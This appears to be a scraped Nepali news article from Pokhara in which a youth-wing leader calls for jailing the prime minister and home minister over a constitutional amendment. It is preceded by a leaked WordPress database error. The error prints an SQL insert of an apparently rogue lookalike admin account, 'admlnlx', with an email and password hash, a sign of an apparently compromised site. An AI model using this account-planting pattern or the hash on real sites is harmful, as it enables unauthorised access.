WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpvp70nW.3bgyULpW/EHNL9eYmY9kj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:27:39', '', 'admlnlx', 'admlnlx')
पोखरा, पुस ९ –
नेकपा एमालेको भातृ संगठन युवा संघ नेपालका अध्यक्ष राजिब पहारीले प्रधानमन्त्री पुष्पककमल दाहाल ‘प्रचण्ड’र गृहमन्त्री बिमलेन्द्र निधिलाई जेल हाल्नु पर्ने जिकिर गरेका छन् ।
प्रधानमन्त्री दाहाल र गृहमन्त्री निधिले भारतको इशारामा संविधान बिपरित संशोधन प्रस्ताब संसदमा दर्ता गरेकोले संविधान बिपरितका काम गर्ने जो कोहिलाइ पनि जेल हाल्नुपर्ने बताएका हुन् । संविधान बिपरितका काम गम्भीर राष्ट्रघाती अपराध भएको भन्दै पहारीले उनीहरुलाई कारबाहीको माग गरेका हुन् ।
युबा संघ पोखरा २६ वडा अधिबेशनको उद्घाटन गर्दै पहारिले संविधन संशोधनले मिलेर बसेका नेपालीलाई विभाजित बनाएको बताए । उनले सिमान्कनको प्रस्ताब कुनै पनि हालतमा बिफल बनाएर छाड्ने दाबी गरे ।